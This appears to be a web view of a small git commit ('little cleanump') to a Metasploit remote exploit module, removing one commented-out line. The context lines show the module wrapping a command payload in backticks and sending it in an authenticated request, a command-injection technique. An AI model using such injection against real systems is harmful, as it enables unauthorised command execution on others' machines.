little cleanump
parent
f07117fe7d
commit
67f0b1b6ee
|
@ -494,7 +494,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
|
||||
end
|
||||
cmd = payload.encoded
|
||||
#cmd = Rex::Text.uri_encode(payload.encoded)
|
||||
cmd = "`#{cmd}`"
|
||||
res = request(cmd,user,pass,uri)
|
||||
if (!res)
|
||||
|
|
Loading…
Reference in New Issue